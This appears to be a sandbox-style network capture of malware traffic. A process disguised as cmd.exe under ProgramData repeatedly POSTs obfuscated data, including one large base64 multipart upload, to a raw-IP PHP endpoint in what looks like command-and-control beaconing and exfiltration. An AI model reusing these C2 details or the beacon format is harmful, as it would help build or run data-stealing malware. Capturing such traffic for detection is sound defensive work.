                                                                                                                                  Jan 3, 2025 20:47:40.694832087 CET384OUTData Raw: 5f 5f 5c 5f 5c 43 5a 51 5a 5c 55 51 59 5a 54 52 56 5a 5d 41 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __\_\CZQZ\UQYZTRVZ]APUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G)3,'-*%7%, \(=??%%-=U>U -%#'++-'_!%Y)7
                                                                                                                                  Jan 3, 2025 20:47:41.060632944 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:41.191145897 CET324INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:40 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 03 24 36 3b 09 24 3b 2b 51 33 14 03 0b 28 3f 27 44 39 31 3c 5e 36 04 2c 0a 3e 33 01 03 3d 11 05 03 35 11 2e 51 36 01 3e 03 2b 3a 23 5b 03 1d 21 06 20 21 2e 12 25 29 39 10 2f 0e 3f 1d 31 2d 39 5f 2b 58 2e 09 21 3e 36 56 35 10 15 0d 38 20 3e 01 27 02 01 5e 28 2e 39 02 24 2f 21 51 00 10 39 54 26 30 39 5f 25 2c 32 12 32 3d 00 04 24 26 23 13 23 2c 0c 1a 31 3b 39 12 2d 32 3c 57 31 32 02 56 35 33 37 05 3e 17 3d 50 26 2b 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: %$6;$;+Q3(?'D91<^6,>3=5.Q6>+:#[! !.%)9/?1-9_+X.!>6V58 >'^(.9$/!Q9T&09_%,22=$&##,1;9-2<W12V537>=P&+"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.449738193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:41.532927036 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:41.888257980 CET2560OUTData Raw: 5f 56 5c 5a 59 40 5a 55 5a 5c 55 51 59 5a 54 54 56 5b 5d 47 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\ZY@ZUZ\UQYZTTV[]GPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+0/]$="&5Z&?#+-8+)&-T*#'.5#/+'_!%Y)7
                                                                                                                                  Jan 3, 2025 20:47:42.176409006 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:42.318356991 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:42 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.449741193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:42.629589081 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:43.173430920 CET2560OUTData Raw: 5f 55 59 59 59 42 5a 55 5a 5c 55 51 59 5f 54 53 56 58 5d 41 50 5c 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _UYYYBZUZ\UQY_TSVX]AP\Z\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+0]$)Z%Q9X&?,<?B5$>=(04-64V+'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:47:43.269217968 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:43.396414995 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:43 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.449742193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:43.533195972 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:43.887830019 CET2560OUTData Raw: 5a 56 59 5f 59 42 5a 54 5a 5c 55 51 59 5a 54 50 56 58 5d 45 50 5c 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZVY_YBZTZ\UQYZTPVX]EP\Z^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 0!%5%?<?=/V(')&-5>3$,6=] '('_!%Y)7
                                                                                                                                  Jan 3, 2025 20:47:44.213927031 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:44.355870962 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:44 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.449744193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:44.506268024 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:44.856565952 CET2560OUTData Raw: 5f 53 5c 5c 59 41 5a 55 5a 5c 55 51 59 5f 54 5b 56 5e 5d 47 50 57 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\\YAZUZ\UQY_T[V^]GPWZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%??\$>1]1Y'?,??<>V&X*=7Y9 ;?='_!%Y)#


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.449745193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:45.042929888 CET443OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary=----6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWm
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 127510
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:45.388192892 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 36 56 30 37 62 62 35 53 76 4a 74 45 56 38 35 54 4d 46 75 49 7a 4a 38 72 70 78 52 38 43 65 30 48 57 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                  Data Ascii: ------6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWmContent-Disposition: form-data; name="0"Content-Type: text/plain_TY^\F_PZ\UQYWTUV[]HP\ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_
                                                                                                                                  Jan 3, 2025 20:47:45.393309116 CET4944OUTData Raw: 5a 2f 5a 6c 53 65 33 54 51 76 50 39 52 2b 4a 45 45 5a 65 76 65 6c 7a 4c 42 6a 78 6e 36 37 6d 4b 64 4f 42 42 66 69 36 33 72 63 4c 72 78 4c 4d 56 56 77 57 44 6d 6f 78 5a 71 74 68 30 48 4b 51 32 6a 2b 37 75 50 36 33 37 6f 53 58 50 54 57 4f 47 77 58
                                                                                                                                  Data Ascii: Z/ZlSe3TQvP9R+JEEZevelzLBjxn67mKdOBBfi63rcLrxLMVVwWDmoxZqth0HKQ2j+7uP637oSXPTWOGwXpCVmVHM4uOmqhd7amgliOz4nVh2smMOfdbE1UW2FzbIqhbljZt3Q1HnUkTC89z2OSZ17tqLtsP/tE36zVJ+JlJWqBYxwvv0k2n7jy07tHyccTsDANPzGVdTDrBIdY9vcO7Aia/JuMRZtMb3xkco9JuapYYDSOqr95
                                                                                                                                  Jan 3, 2025 20:47:45.393358946 CET7416OUTData Raw: 50 78 78 51 54 48 42 48 4e 34 49 41 78 42 36 36 68 4a 64 49 62 6a 79 2f 45 44 39 49 62 38 79 64 66 7a 6f 72 57 76 4c 4a 4c 30 4a 32 53 56 30 63 76 38 32 38 63 73 5a 38 41 75 33 61 45 75 50 59 76 4e 50 63 31 69 77 52 6a 72 64 49 4f 2b 69 54 50 2f
                                                                                                                                  Data Ascii: PxxQTHBHN4IAxB66hJdIbjy/ED9Ib8ydfzorWvLJL0J2SV0cv828csZ8Au3aEuPYvNPc1iwRjrdIO+iTP/aWG67l3Aphbi/e9BrnfpyDA3qljc3LnqxE++ua7rIc/CDtuRP/M2R0u6hxoU3/1e1+GkvhJMRkHFGMYuKsYaNdbs7QsneKH0zH8A7GF956nz+seUQLOo4NqqtfPruJzXM+bP7YqMOBA/zNI7aO5rBq9PvRi06zSSj
                                                                                                                                  Jan 3, 2025 20:47:45.393393040 CET4944OUTData Raw: 71 36 42 72 37 75 56 56 54 30 58 4f 49 58 63 76 63 38 4d 68 52 36 75 61 38 79 4f 6d 6f 42 39 33 61 43 75 46 49 67 64 68 7a 6d 49 78 33 6f 36 66 67 6d 75 4e 39 4b 64 68 79 4a 6e 7a 53 32 70 55 67 38 70 2b 44 6e 4c 6a 32 70 77 74 51 53 35 75 74 35
                                                                                                                                  Data Ascii: q6Br7uVVT0XOIXcvc8MhR6ua8yOmoB93aCuFIgdhzmIx3o6fgmuN9KdhyJnzS2pUg8p+DnLj2pwtQS5ut5JrD4w4OE8KsSxDybcrkizE0cfhnztVVZYPIB8uR79+MBYu9A4d93xCDotc9BOSqNcLvpf6wceu2P4z8Y6DJ31JWPbT0SnBWufKieaNJ1sx2B3LygUy/Vv8wO7dpCSWvLr8Feh3C/tG1BRjtJRDTLK5w8I32rraJ5x
                                                                                                                                  Jan 3, 2025 20:47:45.393634081 CET4944OUTData Raw: 39 36 31 61 36 7a 58 44 4f 79 63 77 37 49 47 30 67 39 4b 50 71 56 6b 32 30 61 32 6c 68 56 6e 36 6d 7a 72 58 62 45 33 49 39 59 2f 61 31 4c 35 5a 6b 75 57 31 4c 53 6d 77 64 54 4a 32 68 56 38 78 4b 55 67 4d 32 37 73 46 4c 33 72 4c 66 70 6a 66 41 6c
                                                                                                                                  Data Ascii: 961a6zXDOycw7IG0g9KPqVk20a2lhVn6mzrXbE3I9Y/a1L5ZkuW1LSmwdTJ2hV8xKUgM27sFL3rLfpjfAl1WuiQnFjSZxLH6YEeUL+jI4OHUK76o1hsPHhQF2Wa1qCh+115aanFrvR4gzn/Wnf6vz34hEStz8cAZWN4QxwMRRZlEeUDMvAquuOorhlwuuGWqPlRIDyKNyqNxT6DUWtHGNXOm81/H0mWRMkSz9oXDgp69Qks9286
                                                                                                                                  Jan 3, 2025 20:47:45.393959999 CET2472OUTData Raw: 63 4b 30 30 36 68 57 62 45 35 6d 2b 6b 30 39 30 4d 2f 62 64 57 2b 68 65 63 7a 4c 6a 4a 35 45 4a 66 70 6c 71 66 61 73 4f 77 55 55 6e 56 36 44 37 6d 48 6d 44 68 6b 56 64 64 5a 66 48 65 51 79 72 44 33 35 4e 53 79 7a 62 4f 51 67 30 2b 67 76 32 6c 2b
                                                                                                                                  Data Ascii: cK006hWbE5m+k090M/bdW+heczLjJ5EJfplqfasOwUUnV6D7mHmDhkVddZfHeQyrD35NSyzbOQg0+gv2l+Wl92VW+cnimj4UjuAe/yLtiANSa37IygoEs2iLqHcYDhVPhWe2L468C/Hwq0dVDxbRy1z2nTKIYNq+JzXRH3a48VWnGw9MZ+fuMcyymJN839RxoErWCrAPhS/HpEKeTKRFYX4e+RqS7nG0ihhnvRkZE8U5VF8TL0n
                                                                                                                                  Jan 3, 2025 20:47:45.398180962 CET4944OUTData Raw: 50 79 4c 45 4a 78 53 33 51 59 30 4d 34 75 4f 50 66 5a 6b 4e 49 54 72 56 35 33 6b 51 33 52 49 72 6b 53 74 36 6b 57 71 34 56 58 45 59 63 67 70 72 79 52 43 69 42 79 65 6c 52 72 6b 30 53 30 55 58 6b 72 4b 6f 30 45 43 57 34 4e 41 78 68 4b 49 32 4c 73
                                                                                                                                  Data Ascii: PyLEJxS3QY0M4uOPfZkNITrV53kQ3RIrkSt6kWq4VXEYcgpryRCiByelRrk0S0UXkrKo0ECW4NAxhKI2Ls2CXo24TtmnmIXLaOBAKEFciAI+/K0+92OCsVSXwiDQwWSssgK1DPOFnB2crG2JMgHJ/CFVu7hzFolweTDohZuiMloWMjwVDQp2wSHpVxJdMoHoiWehuLXWQmmm6XJe6FaaLXpJvTd15N1IRNOaKtJWfg6EYmtaO7a
                                                                                                                                  Jan 3, 2025 20:47:45.398238897 CET4944OUTData Raw: 31 35 64 39 77 47 77 65 79 4f 38 78 34 49 48 62 33 58 6a 41 61 42 4e 7a 63 44 34 50 44 77 52 6f 48 4c 31 78 31 78 63 65 2f 2b 4b 73 68 6c 56 6f 38 76 7a 43 4b 4f 72 65 6c 36 39 64 34 4a 33 58 4c 6a 70 75 35 7a 30 63 49 76 70 55 56 4d 66 71 50 69
                                                                                                                                  Data Ascii: 15d9wGweyO8x4IHb3XjAaBNzcD4PDwRoHL1x1xce/+KshlVo8vzCKOrel69d4J3XLjpu5z0cIvpUVMfqPi3DPWb08XfEbQ11U/DLf93xNCDyciIEDf1fUnZNGfF1PMKni5aEvnkBIoXs9v5X6utsVIWcHqd5WgiDCHPAacgj6CxUMSGbhOheY7bNykgkke45G0tqD0ei4qISTvs/1XkCgMKIWq7/a/Hh4WmcZQKumTBCiWKvhCb
                                                                                                                                  Jan 3, 2025 20:47:45.398263931 CET4944OUTData Raw: 50 75 70 78 4c 56 4b 79 6c 50 31 67 4a 34 4c 7a 49 43 39 30 6d 41 6f 72 76 2f 73 39 53 36 52 49 72 75 79 6c 36 34 33 32 55 4a 66 75 38 43 7a 68 31 69 48 30 30 55 49 65 6a 57 61 52 71 6f 39 53 4c 46 52 6c 4b 33 74 61 46 41 48 50 75 78 53 62 76 54
                                                                                                                                  Data Ascii: PupxLVKylP1gJ4LzIC90mAorv/s9S6RIruyl6432UJfu8Czh1iH00UIejWaRqo9SLFRlK3taFAHPuxSbvTK9hGI8QCEGeJGRlOdCUG0rKpLvb01fwI0eHPStfyEus7xsIdA9wg4WDWJ0lSEwP29WlM59RVyP2kOOYx/toCR0zmB6TNDWEVqeGcnf8iTPKj0nUXmtWei3+kovzhY9PRLR92o20Q6hOBlOxMSDE3324F4c+fRQHee
                                                                                                                                  Jan 3, 2025 20:47:45.441416979 CET34608OUTData Raw: 68 6e 4a 63 32 71 70 6f 6c 6e 69 6e 6c 7a 5a 4f 49 57 6e 48 4c 70 41 51 33 45 42 41 75 65 7a 53 49 5a 65 62 33 55 53 79 4c 35 56 66 54 43 49 36 4a 44 6c 4f 38 47 71 69 53 6d 48 58 4f 6f 54 73 5a 39 39 35 2f 6a 5a 6c 63 49 75 73 34 4d 41 63 31 6c
                                                                                                                                  Data Ascii: hnJc2qpolninlzZOIWnHLpAQ3EBAuezSIZeb3USyL5VfTCI6JDlO8GqiSmHXOoTsZ995/jZlcIus4MAc1lHuS5RGtKSqvWawavWRp3dzZhk63XDSnrGkX7yiIAC9Vaz1gn199c07JK0j5RTXsm3bMDwF6s4Ej3VsjQluh19+KoYcCOsUUB/i3zj1qD+ZOR584DRt1phg3/Axxz3ViDs97ZmqMg8Ut4wLqMhSW4O0lOWU0DgAQI1
                                                                                                                                  Jan 3, 2025 20:47:45.711139917 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:45.925276041 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:45.996280909 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:45 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.449746193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:45.246521950 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:45.591322899 CET2560OUTData Raw: 5f 5e 59 5f 5c 46 5f 55 5a 5c 55 51 59 5d 54 50 56 59 5d 45 50 56 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^Y_\F_UZ\UQY]TPVY]EPVZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+#;]3=6%5\&,$Z>-;?$=1>(3'.%"$;(='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:47:45.903739929 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:46.036164045 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:45 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.449747193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:46.241578102 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:46.590970993 CET2560OUTData Raw: 5f 56 5c 52 5c 43 5a 56 5a 5c 55 51 59 58 54 51 56 5b 5d 45 50 51 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\R\CZVZ\UQYXTQV[]EPQZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)3?^0X5&&1<[>>$)75%*)3Y9%9#Q?V+='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:47:46.864732027 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:46.992018938 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:46 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449749193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:46.753181934 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1884
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:47.108764887 CET1884OUTData Raw: 5f 50 5c 53 5c 47 5a 5a 5a 5c 55 51 59 59 54 5a 56 51 5d 41 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _P\S\GZZZ\UQYYTZVQ]AP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(;05]14%X1(?("W%5T(#_.6:7#+='_!%Y)
                                                                                                                                  Jan 3, 2025 20:47:47.454494953 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:47.584089041 CET324INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:47 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 01 25 36 27 0a 33 2b 30 08 24 5c 29 09 2a 3c 2f 06 3a 08 3b 07 22 04 3c 0d 29 0d 38 13 2a 01 23 00 21 01 2a 54 21 3f 35 5a 2a 3a 23 5b 03 1d 22 58 22 0c 39 06 32 3a 2e 03 38 09 3f 1b 26 2d 39 59 3f 3e 0f 52 37 07 39 0c 35 3e 23 0d 2c 33 2d 10 24 12 37 59 3f 3d 00 5a 30 05 21 51 00 10 39 1f 27 30 29 59 33 3c 0c 1d 26 03 0b 58 25 26 23 13 22 5a 26 18 32 06 25 13 2f 32 28 1d 31 1c 28 1b 35 0a 34 5f 29 39 04 09 32 3b 22 5f 2a 01 20 52 00 31 5c 51
